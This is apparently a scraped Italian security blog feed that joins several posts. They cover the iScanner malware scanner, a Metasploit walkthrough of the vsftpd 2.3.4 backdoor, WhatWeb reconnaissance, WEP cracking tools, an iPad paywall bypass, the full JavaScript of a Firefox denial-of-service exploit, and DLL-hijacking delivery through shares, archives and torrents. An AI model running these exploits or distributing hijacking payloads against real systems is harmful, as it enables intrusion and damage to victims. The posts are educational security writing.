iScanner è un software scritto in Ruby che permette di individuare ed eventualmente rimuovere codice maligno all’interno delle pagine web, nello specifico l’applicativo permette:

• Rilevamento di codice maligno all’interno delle pagine web;
• Rimozione automatica di un eventuale codice sospetto all’interno delle pagine web;
• Sistema di Backup dei file elaborati;
• Database aggiornabile;
• Report all’interno di un file di log delle minacce rilevate con la possibilità di inviare una eMail riepilogativa.

L’installazione del software è veramente molto semplice, una volta effettuato il Download dell’applicativo ed estratto l’archivio basterà digitare da shell il seguente comando:

./installer -i

successivamente lanciando il comando:

iscanner .h

è possibile visualizzare tutti i comandi disponibili che per comodità vi riepilogo dopo il salto.

Nell’immagine principale ho analizzato un sito web segnalatomi attraverso la Mailing List  Sikurezza.org (Italian Security Mailing List) nella quale un utente richiedeva maggiori informazioni di attendibilità del sito glandorepartners.com e come lo stesso utente prevedeva la pagina web contiene un codice Javascript offuscato.

Un codice Javascript offuscato solitamente è portatore di operazioni malevoli ma non è sempre scontato, pertanto conviene successivamente analizzare il codice estrapolandolo dal file di log e con un po’ di pazienza procediamo all’analisi.

Nell’esempio riportato il presunto codice malevolo invia ad ogni accesso al sito web una eMail all’indirizzo acollins [AT] glandorehealthcare.com informando il webmaster della nostra visita.

Principali comandi di iScanner

    -R        Use this option to scan a remote web page / website.
# iscanner -R http://example.com

-F        Use this option to scan a specific file.
# iscanner -F /home/user/file.php

-f        Use this option to scan a specific directory.
# iscanner -f /home/user

-e      This option will allow you to select specific file extensions for
scanning, by default iScanner will scan [htm, html, php, js] if you
wanted to scan other or specific extensions only:
# iscanner -f /home/user -e htm:html

-d      By default iScanner will load the latest version of signatures
database in the folder, if wanted to use older or modified version
of the database:
# iscanner -f /home/user -d database.db

-M      Using this option allows you to specify malware code and iScanner
will automatically generate regex signature for it then scan the
files / website you want (incase you wanted to scan for specific
code or undetected malware!)
# iscanner -M /home/user/malware_code.txt -f /home/user
# iscanner -M /home/user/malware_code.txt -R http://example.com

-o      Using this option will allow you to choose the name of the infected
log file. If this option wasn’t used the name of the infected log
file will be in this format “infected-[TIME]-[DATE].log”, if you
wanted to select other name:
# iscanner -f /home/user -o user.log

-m      With this option you can tell iScanner to send a copy of the
infected log to selected email address:
# iscanner -f /home/user -m email@example.com

-c      This option will clean the infected files by removing the malicious
code only without deleting the infected files. Before using this
option make sure to check the infected log to know what exactly
iScanner is going to remove from each infected file.
# iscanner -c infected.log

-b      If you used this option iScanner will take backup from the infected
files before cleaning it. You can find backup of the cleaned files
in a folder have the name “backup-[TIME]-[DATE]“.
# iscanner -b -c infected.log

-r      If you used the previous option when cleanning the infected log and
something went wrong, use this option to restore the files from the
backup directory.
# iscanner -r backup/

-a      Using this option will make iScanner clean every infected file
automatically. This option could be dangerous if you didn’t scan
the folder before and you don’t know the results.
# iscanner -f /home/user -a

-D      This option will make iScanner run in the debug mode, the option
will be useful if you had problem while running iScanner.
# iscanner -f /home/user -D

-q      If you don’t want to see any output from iScanner you can enable
this option to make the program run in the quit mode.
# iscanner -f /home/user -q

-s      This option allows you to send malicious file to iScanner’s
developers for analyses. This will help us improve the signatures
database and keeping it updated.
# iscanner -s /home/user/malicious_file.html

-U      With this option you can update iScanner and the signatures
database to the latest version easily.
# iscanner -U

-u      This option will update the signatures database only instead of
updating the whole program.
# iscanner -u

-v      This option will print iScanner’s version and release date with
the database version and it’s release date too.
# iscanner -v

-h      This option will show the help message.
# iscanner -h

Clicca qui per vedere il video incorporato.

Versione:
vsftpd-2.3.4 del 30/06/2011

Dimostrazione Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

WhatWeb è un tool sviluppato da Andrew Horton nel Novembre del 2009 ed ha come scopo l’estrapolazione di maggiori informazioni tecniche su uno o più host. Per informazioni tecniche si intendono tutti i dati rilevanti per una corretta analisi di IT Security quali la versione del
server Apache, PHP, CMS ed altre informazioni che andremo a scoprire in questo articolo.

Installazione

WhatWeb è un applicativo per ambienti Linux e richiede Ruby per poter funzionare ed altre importanti dipendenze, di seguito vi riporto un esempio di installazione in ambiente Ubuntu.

Innanzitutto installiamo Ruby da riga di comando con il seguente comando:

sudo apt-get install ruby ruby-dev libopenssl-ruby rubygems1.8

successivamente dovremo installare le seguenti dipendenze di Ruby, sempre da riga di comando imputiamo:

sudo gem install anemone em-resolv-replace json bson bson_ext mongo rchardet

Terminata questa prima fase scaricate WhatWeb dal sito di Andrew Norton (http://bit.ly/kspIud) e salvatelo dove preferite.

Avvio

L’avvio di WhatWeb è veramente semplicissimo, si utilizza esclusivamente da riga di comando, basterà digitare il comando ./whatweb che immediatamente ci apparirà a monitor l’help con tutti i possibili comandi da sfruttare.

Utilizzo

L’imponente Help che vi è apparso a monitor una volta lanciato l’applicativo non vi deve spaventare l’utilizzo è abbastanza semplice e comunque vi riepilogherò le principali funzioni.
WhatWeb funziona attraverso dei plugin, più di 800, che permettono la corretta scansione di un host e vengono gestiti dal software in base al livello di “aggressione” che preferite:

1. 1. PASSIVA: Effettua una sola richiesta sul target, fatta eccezione per i reindirizzamenti.
2. 2. VUOTO: Livello ad oggi non implementato, verrà sviluppato in futuro.
3. 3. AGGRESSIVO: Effettua una scansione approfondita del host principale
4. 4. PESANTE: Scassinamento approfondito su tutti gli URL del host.

Il livello di default è il primo, ma personalmente vi consiglio di utilizzare sempre il terzo ed attivare la modalità VERBOSE in modo da avere nozioni più esplicative.
È inoltre possibile impostare l’User Agent, il server Proxy, l’esportazione personalizzata dei log e la possibilità di gestire i redirect.

Esempio

Lanciando il seguente comando:

whatweb –log-verbose=log.txt –aggression=3 www.iltrillo.com

andremo ad avviare il programma con il terzo livello di aggressività e gli chiederemo di generare un file “log.txt” contenente il risultato in modalità verbose della scansione ma di riportarci a monitor immediatamente le nozioni essenziali sul host www.iltrillo.com.
Visualizzando il risultato della scansione notiamo immediatamente che il software ha analizzato l’host da noi fornitogli ma ha proseguito ad analizzare il redirect www.iltrillo.com/forum/ dal quale possiamo trarre nozioni importanti.

Il server che ospita il nostro Host è di tipo Unix con Apache 2.0.63 e PHP 5.2.14. Si trova in Olanda, le nostre visite vengono monitorate tramite Google Analytics, il forum è basato sulla piattaforma vBulletin 4.0.4 e vi è un blog basato su WordPress.

Basterà pertanto approfondire le ricerche per capire se le versioni rilevate soffrono di Exploit permettendoci di compilare un completo report da IT Security Researcher.

Clicca qui per vedere il video incorporato.

Software Utilizzato

Per effettuare questa video guida ho utilizzato WepCrackGUI e la distribuzione Linux BackBox.

Note Legali

L’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge art. 615-ter c.p.

La detenzione, la diffusione abusiva di codici di accesso a sistemi informatici/telematici o condotte prodromiche alla realizzazione di un acceso abusivo sono reati penale perseguibili secondo la legge 615-quater c.p.

Pertanto l’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete la quale il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Gli Autori di questo Blog non potranno essere ritenuti responsabili di eventuali violazioni derivanti da un uso proprio o improprio delle tecniche esposte in questo articolo aventi uno scopo prettamente informativo e didattico.

Clicca qui per vedere il video incorporato.

In questo video prodotto da Clshack vediamo come è possibile reindirizzare il traffico dati di un PC verso un host inesistente, oppure bloccare la connessione ad un singolo sito web con tcpkill durante un arp poisoning.

Trovate maggiori dettagli sulla configurazione di Scapy direttamente sul sito dell’autore.

Oggi vedremo come installare WepCrackGUI sulla distribuzione BackBox dedicata al penetration testing, innanzitutto scarichiamo il software dal SourceForge e scompattiamolo dopo preferiamo.

Da riga di comando dovremo installare Mono e GTK necessari per il corretto avvio di WepCrakGUI, iniziamo con Mono! Avviamo la riga di comando e digitiamo:

sudo apt-get install mono-devel

ad installazione avvenuta passiamo subito alle librerie grafiche GTK:

sudo apt-get install gtk-sharp2

perfetto ora potremo avviare WepCrackGUI col classico comando

sudo ./wepcrack

]]> http://www.oversecurity.net/2010/12/23/installare-wepcrackgui-su-backbox/feed/ 2 http://www.oversecurity.net/2010/11/27/ipad-newspapers-exploit/?utm_source=rss&utm_medium=rss&utm_campaign=ipad-newspapers-exploit http://www.oversecurity.net/2010/11/27/ipad-newspapers-exploit/#comments Sat, 27 Nov 2010 22:17:36 +0000 Andrea Draghetti http://www.oversecurity.net/?p=1654

Clicca qui per vedere il video incorporato.

Descrizione

Questo video ha l’intento di dimostrarvi come sia possibile aggirare la metodologia di acquisto di una Rivista o Quotidiano nell’iPad o altro dispositivo iOS, permettendoci di accedere al contenuto desiderato in maniera totalmente gratuita evitando il pagamento del contributo richiesto attraverso In-App Purchase di Apple.

Nel video viene dimostrato esclusivamente la fattibilità di quanto dichiarato ma non verranno, volutamente, esposte le tecniche che portano a tale risultato a tutela del mondo dell’editoria Italiana ed Internazionale. Per questa motivazione non è visibile nel video la barra degli indirizzi del Browser Safari e non solo.

Funzionamento

Dopo una attenta analisi dei pacchetti di rete ricevuti ed inviati (packet sniffer) da ogni singola applicazione è possibile determinare la fonte dei quotidiani o riviste, successivamente sfruttando la tecnica di spoofing è possibile accedere direttamente da Safari al contenuto desiderato evitando il pagamento tramite l’In-App Purchase del contributo richiesto dall’editore.

Viene dimostrato il funzionamento dell’exploit su un ristretto numero di Riviste ed un Quotidiano ma è possibile estendere tale tecnica anche per la lettura di altre testate.

Conclusione

Tale dimostrazione ha lo scopo di incentivare gli sviluppatori a migliorare le loro applicazioni e a progettare con un maggiore accuratezza le infrastrutture di rete.

Il team Italiano di BackTrack ha recentemente trovato un exploit 0Day per Mozilla Firefox, il quale prevede un Remote Denial of Service.

Dopo il salto il codice dell’exploit…

<!--

0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili    <emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini    <white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia    <scox@backtrack.it>

-->

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}

for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}

</script>

Clicca qui per vedere il video incorporato.

Grazie al nostro lettore Frank siamo in grado di dimostrarvi tramite un bellissimo video l’esecuzione dell’exploit DLL Hijack.

Il video si scompone principalmente in due parti, nel primo caso viene eseguito un semplice file .html associato al Browser Mozilla Firefox che al lancio richiama una DLL invisibile contenente un malware che infetterà il pc rendendolo un client e collegandosi al server RAT schwarze sonne, prendendo così pieno possesso del PC della vittima.

Importante notare in questa prima parte del video due dettagli:

• Viene usata l’ultima versione di Mozilla Firefox (3.6.8); ancora oggi dopo circa 20gg dal ritrovamento di tale falla non è stata rilasciata una versione del Browser che risolva la problematica.
• La DLL è stata resa invisibile, di default nessun sistema Windows rende visibili i file nascosti; questa caratteristica rende ancora più vulnerabile il pc della vittima.

Nella seconda parte del video viene sfruttata la medesima tecnica però cambiando il software di “lancio” della DLL sfruttando il lettore multimediale VLC.

]]> http://www.oversecurity.net/2010/09/06/dll-hijack-video-dimostrativo/feed/ 0 http://www.oversecurity.net/2010/09/04/exploiting-dll-hijack-esempi-reali/?utm_source=rss&utm_medium=rss&utm_campaign=exploiting-dll-hijack-esempi-reali http://www.oversecurity.net/2010/09/04/exploiting-dll-hijack-esempi-reali/#comments Sat, 04 Sep 2010 10:51:41 +0000 Andrea Draghetti http://www.oversecurity.net/?p=1439 Lo scorso Agosto vi avevo introdotto la nuova tecnica di DLL Hikacking in questo articolo, ma stanotte mi sono imbattuto in un interessante articolo di Bruno Filipe che dimostra come può essere sfruttata tale tecnica nella realtà!

Utilizzando una cartella condivisa su un server SMB / WebDav

Questa è forse la tecnica più comune di come il dll hijack  viene sfruttato, sicuramente perché può essere sfruttata da remoto.  Esiste già un modulo per Metasploit che utilizza questa tecnica. Esso prevede l’inserimento in una cartella condivisa di una DLL infetta e di un file pulito con l’obbiettivo di far aprire al target il file pulito. All’appertura del file pulito realmente viene caricata la DLL infetta che procede ad installare un malware/trojan sul PC della vittima.

Un archivio compresso (. zip, . tar.gz, . rar, ecc ecc)

Questa tecnica prevede l’inserimento in un archivio di un gruppo di file più una DLL, l’obbiettivo sarà quello di far estrarre l’intero contenuto dell’archivio e procedere all’appertura di un file “pulito” che provvederà a richiamare la DLL infetta contenuta nell’archivio.

Torrent

Sicuramentr questa tecnica ha il vantaggio di avere una diffusione su grande scala pertanto è da considerarsi veramente dannosa, il principio si basa sulla precedente tecnica dell’archivio ma grazie alla difffusione dei Torrent e di un minimo di Social Engineering sarà possibile ottenere un grande numero di bersagli.

Ipotizziamo di distribuire sul canale Torrent l’ultimo album di Shakira (sicuramente richiestissimo), ovviamente l’archivio non conterrà esclusivamente l’album ma anche la DLL infetta. L’utente una volta completato il download dell’ablum provvederà ad estrarlo ed ad ascoltare l’album…ed ecco che viene caricata la DLL.

Multi Exploiting DLL Hijack

Questa tecnica prevede l’inserimento di più DLL infette all’interno di una risorsa condivisa, un archivio o un torrent in modo da aumentare notevolmente le possibilità di attaccare la vittima.

Prendendo spunto dal precedente esempio dell’album di Shakira non possiamo avere una certezza di quale player multimediale utilizza la vittima per riprodurre gli mp3 per cui inseriremo all’interno dell’archivio contenente l’album più DLL infette (ognuna per ogni lettore multimediale) dandoci così la possibilità di incrementare il buon esito dell’attacco.